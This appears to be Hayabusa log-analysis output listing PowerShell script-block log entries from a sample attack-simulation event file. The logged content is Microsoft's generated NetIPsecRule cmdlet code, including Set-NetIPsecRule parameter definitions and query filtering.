$__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 
'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and 
(@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 